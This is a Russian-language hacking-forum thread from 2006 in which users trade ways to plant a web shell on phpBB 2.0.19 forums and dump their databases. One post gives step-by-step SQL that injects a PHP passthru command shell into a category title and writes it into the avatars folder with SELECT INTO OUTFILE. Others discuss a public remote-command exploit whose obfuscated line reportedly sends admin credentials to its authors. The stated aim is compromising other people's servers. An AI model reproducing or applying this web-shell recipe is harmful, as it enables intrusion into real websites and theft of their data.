Форумы phpBB 2.0.19 + shell, если есть права админа

Discussion in 'Уязвимости CMS/форумов' started by Goudini, 13 Jun 2006.

  1. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Каким образом можно получить шелл на phpBB 2.0.19, если есть права админа.
    Хочу сделать дамп баз, подключить шелл, но не знаю как открыть установочный путь форума, пробовал http://www.site.com/phpbb/admin/admin_disa...p?setmodules=00, но отображается пустая страница.....
     
  2. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    А не проще при помощи сплойта от Rst выполнения удаленных команд, залить их шелл? И базу не мучатся качать.
    Вот тут обсуждалось http://forum.antichat.ru/thread17477-2.0.19.html
     
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    кинь сцылку в пм, посмотрим что к чему
     
  4. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Пробовал, но команды не выполняются, не знаю почему...
     
  5. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Блин, я шелл в 2.0.19 делал так... заходил в админку, сохранял БД на винт, искал там вот таку строку:
    INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
    потом заменял на
    INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
    SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;

    UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1; (после этой строки поставь ещё один Enter). Сохранял файл... и восстанавливал БД. После вот по этому
    home/test2.ru/www/phpbb/images/avatars/shell.php у меня был шелл. НУ а дальше сам! :cool:
     
  6. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Dr.Check
    Я так тоже делал на локалхосте, всё легко, так как ты знаеш полный путь к форуму
    home/test2.ru/www/phpbb
    А как ты собираешся его узнать на чужом серваке?
     
  7. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    А ты сплойт подправил? Там ids маячок стоит....
     
  8. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    А разве это как-то сказывается на его работе?
    На локалхосте работал, а чтоб поправить не хватает заний перла... жаль
     
  9. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Кроме того что пароль и логин админа домой уходят никак ))))
     
  10. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    /admin/admin_disallow.php?setmodules=1 вот этот путь вставь......
     
  11. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Всмысле домой - к рст?
    Как почистить сплоит? Помогите
    Могу просто удалить строчку
    $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?='.$ids);
    Но будет ли он работать, а то тут что-то зашифровали ;)
    Работает в младших версиях, у меня открывает пустую страницу
     
    #11 Goudini, 14 Jun 2006
    Last edited: 14 Jun 2006
  12. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
  13. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154